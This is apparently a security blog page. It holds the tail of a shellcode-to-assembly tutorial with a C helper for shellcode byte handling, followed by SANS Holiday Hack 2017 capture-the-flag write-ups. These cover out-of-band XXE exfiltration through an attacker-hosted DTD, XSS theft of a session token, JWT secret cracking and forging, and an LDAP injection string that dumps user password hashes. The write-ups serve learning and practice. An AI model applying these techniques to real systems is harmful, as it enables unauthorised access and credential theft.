With this we get the shellcode string directly, without picking the bytes out of the disassembly by hand. Note that objdump -d only disassembles code sections, so anything the program keeps in .data (the hello world message here) is not part of the string.

Sweet! The first part of the tutorial is over; moving on to the next: shellcode to assembly.

Now, given the following shellcode, how do we get back to a working ELF executable?
"\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xa4\x90\x04\x08\xba\x10\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x02\x00\x00\x00\xcd\x80"

Let's copy the shellcode and save it to a file. Note that we save the shellcode as raw bytes, not as the escaped text; perl does this for us.

Syntax:   perl -e 'print "YOUR SHELL CODE"' > outputFile

perl -e 'print "\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xa4\x90\x04\x08\xba\x10\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x02\x00\x00\x00\xcd\x80"' > hexraw

Now we use the ndisasm utility (NASM's disassembler) to disassemble the file: it converts the raw opcodes back into the equivalent asm instructions. -b 32 selects 32-bit mode.

Syntax :  ndisasm -b 32 hexraw



Now you can see we have almost the same code we wrote, except that line 3 contains a hardcoded address (0x80490a4, where the message lived in .data) and line 4 a hardcoded value (0x10, the message length). The problem is that the shellcode only contained the .text section, not the .data section, so the message itself is missing. Let us fix this by modifying the code a little and restoring the message in .data.

With that fixed we get our ASM code back and it executes successfully.
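Added example, not from the post: the two conversions this post performs by hand, the objdump one-liner's bytes-to-"\xNN" formatting and the perl print's "\xNN"-to-raw-bytes decoding, implemented in C as a round trip over the hello world shellcode quoted above (embedded here as a constructed input), plus a bad-character scan. The scan shows why this particular shellcode, with its full 32-bit immediates, could not be delivered through a strcpy-style copy: 15 of its 34 bytes are NUL. The buffer sizes and the name of the bad-byte list are assumptions of this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The hello world shellcode quoted in the post, kept in the "\xNN" text form
 * (constructed input for this example). */
static const char HELLO_SHELLCODE[] =
    "\\xb8\\x04\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xb9\\xa4\\x90\\x04\\x08"
    "\\xba\\x10\\x00\\x00\\x00\\xcd\\x80\\xb8\\x01\\x00\\x00\\x00\\xbb\\x02\\x00\\x00\\x00\\xcd\\x80";

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decodes a "\xNN\xNN..." string into raw bytes (what perl -e 'print "..."'
 * writes to hexraw). Returns the byte count, or 0 for a malformed escape or
 * when out (cap bytes) is too small. */
size_t escapes_to_bytes(const char *s, unsigned char *out, size_t cap)
{
    size_t n = 0;
    while (*s != '\0') {
        int hi, lo;
        if (s[0] != '\\' || s[1] != 'x' || (hi = hexval(s[2])) < 0 || (lo = hexval(s[3])) < 0)
            return 0;
        if (n == cap)
            return 0;
        out[n++] = (unsigned char)(hi * 16 + lo);
        s += 4;
    }
    return n;
}

/* Encodes raw bytes as "\xNN..." (the string the objdump one-liner prints).
 * Returns the string length, or 0 if out (cap bytes) cannot hold it. */
size_t bytes_to_escapes(const unsigned char *b, size_t n, char *out, size_t cap)
{
    if (cap < 4 * n + 1)
        return 0;
    for (size_t i = 0; i < n; i++)
        snprintf(out + 4 * i, 5, "\\x%02x", b[i]);   /* "\x" + 2 digits + NUL */
    return 4 * n;
}

/* Counts shellcode bytes that appear in the bad-character list `bad`. */
size_t count_bad_bytes(const unsigned char *b, size_t n,
                       const unsigned char *bad, size_t nbad)
{
    size_t count = 0;
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (b[i] == bad[j]) {
                count++;
                break;
            }
    return count;
}

int main(void)
{
    unsigned char raw[64];
    char text[256];
    const unsigned char nul = 0x00;
    size_t n = escapes_to_bytes(HELLO_SHELLCODE, raw, sizeof raw);
    bytes_to_escapes(raw, n, text, sizeof text);
    printf("%zu bytes, %zu NUL bytes, round trip %s\n", n,
           count_bad_bytes(raw, n, &nul, 1),
           strcmp(text, HELLO_SHELLCODE) == 0 ? "ok" : "mismatch");
    return 0;
}
```

The NUL bytes come from mov eax, 4 and the other 32-bit immediates; the usual fix, as in the execve shellcode used elsewhere on this page, is to zero a register and use short forms such as push 0xb / pop eax or mov al, 4.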



References:

https://en.wikipedia.org/wiki/System_call
https://www.youtube.com/watch?v=G4wA7Zm-DIU&feature=youtu.be
http://searchsecurity.techtarget.com/answer/What-is-the-relationship-between-shellcode-and-exploit-code

Tuesday, 16 January 2018

SANS HOLIDAY HACK 2017 : PART 5

If you have not read the 1st Part then read it here.

http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html

This part is all about exploiting machines. Each challenge leads us to a page of the Great Book that will answer the question of who was actually behind hurling those massive snowballs.

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

We can find the IP of the internal host from the nmap scan run on the compromised machine in PART 2 of this series:

nmap -PS80 -v 10.142.0.1/24 --open



Let us connect to Alabaster's system again over SSH with local port forwarding.


We modify our hosts file slightly so that http://eaas.northpolechristmastown.com points at the forwarded port.



Now that this is done, we can browse to the website.



Going through the website we find two interesting things.

1. A DisplayXML page where all the Elves are listed



2. A Builder form which allows us to upload an XML file and builds the GUI from it


There is also a sample available on the website at http://eaas.northpolechristmastown.com/XMLFile/Elfdata.xml

This is roughly what it looks like:



I then tried performing XXE attacks, but failed.


One blog post from SANS, provided in the hints that got unlocked on solving the terminal challenges, came in useful:

https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities

So we create two files:

1. xxepoc.xml, containing the malicious XML that we upload. We can build this POC by following the XML structure of the sample above.



2. evil.dtd, containing the malicious DTD that we host ourselves.

After uploading the XML document I looked at the Apache access.log.


However, I could not find any contents of greatbook.txt. I tried many combinations.

After failing multiple times I decided to check whether anyone had solved this challenge, and interestingly I found one writeup:

https://duo.com/blog/sans-holiday-hack-2017-writeup

After comparing both POCs, I found only one difference.

The author encodes "% sendit" as "&#x25; sendit" in the evil.dtd.

I don't know the reason behind it, as the second occurrence of % is not encoded. However, for the sake of solving it, I modified my payload the same way, executed it and looked at the access.log file.

And guess what? It worked!


I still need to find out why it has to be done this way; if you know the reason, please leave the answer in the comments.

Following the URL from the access.log we can find the 6th page of the book.






SANS HOLIDAY HACK 2017 : PART 6

If you have not read the 1st Part then read it here.

http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html

This part is all about exploiting machines. Each challenge leads us to a page of the Great Book that will answer the question of who was actually behind hurling those massive snowballs.

Challenge

8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

An nmap scan of the internal network from the compromised Alabaster's system finds the edb server.


We connect to Alabaster's machine again and use SSH port forwarding to port 80 to reach the web application.


We also edit our hosts file so that edb.northpolechristmastown.com resolves to the forwarded port.


Now we can access the application


Once there, we try logging in with Alabaster's credentials, but it doesn't work.

Looking at the intercepted requests, we see a session value in the cookie. My target is to steal the victim's session cookie and replace our session value with it.

There is a client-side simulation of a victim, and we need to perform a phishing attack against it.

This is the password reset page



There is an XSS filter in place, so we need to write an XSS filter evasion payload to steal the cookie.


So our payload for the attack is:

Now we send the forged password reset request to the victim.


On successful exploitation, the victim's cookie shows up in our access.log.

At this point I tried replacing the session value with the stolen cookie value, but it did not work.

The source code of the home page revealed one more juicy piece of information: the client stores an np-auth token in localStorage, and if one is present it is sent to the server for validation. If that succeeds, the user is logged into the application.

Let's modify the XSS payload to steal the np-auth token.

After successful exploitation, we have the np-auth token.

Decoding the JWT reveals the information we need to log in, and also what has to be changed for the token to be valid, for example the expiry date.


So let us first try cracking the np-auth token's signing secret; for this we can use jwt-cracker.


jwt-cracker reveals that the secret used to sign the JWT is 3lv3s.

Now that we have all the information, we need to do the following:

1. Modify the expiry date
2. Create a new np-auth token signed with the secret key
3. Add the np-auth token to our localStorage

We will write a small piece of code to do the first two tasks in one shot!


Executing the program gives us the JWT for our np-auth.



For the last step we open the developer console and run JavaScript to store the generated np-auth value in localStorage.


After this we refresh the page, and bingo! We are in!


Through the proxy tool we find that the UI models are fetched over an XML call and then populated into the page.

A few points to note from the code:

1. We can search "beyond" the available options of Elf and Reindeer
2. To perform administrator operations, an administrator password is required

From the debug code we can understand that an LDAP directory backs the application.


I tried searching for a well-known reindeer, Rudolph, and then used blind injection techniques to figure out the password field; there is one field called userPassword which holds the password in hashed form.



So our final target is an LDAP injection that bypasses the intended query and lets me search any entry regardless of its 'ou', i.e. ou=*. One more thing we can infer from the message box: whenever I try to access the Santa Panel, I get the notification "You must be Claus to enter the Panel".

So I use "Claus" as the gn value and ou=*.

Sending the request with the input claus*)(ou=*))(&(gn= and modifying it slightly by adding the password field, I can dump every user's information with hashed passwords.
Response


Our next step is to recover the plaintext of Claus's password hash, which turns out to be 001cookielips001.




Now if we try to log in with Santa's email and password, it won't work. Guess why? Because we are logged into Alabaster's account via the np-auth token we set, so we need to generate another auth token with Santa's information.

Once we generate a new token with the department set to 'administrator' and 'ou' set to *, store it and refresh the browser, we get a prompt. Here we provide the plaintext password obtained by cracking the hash.


And finally we can retrieve the letter.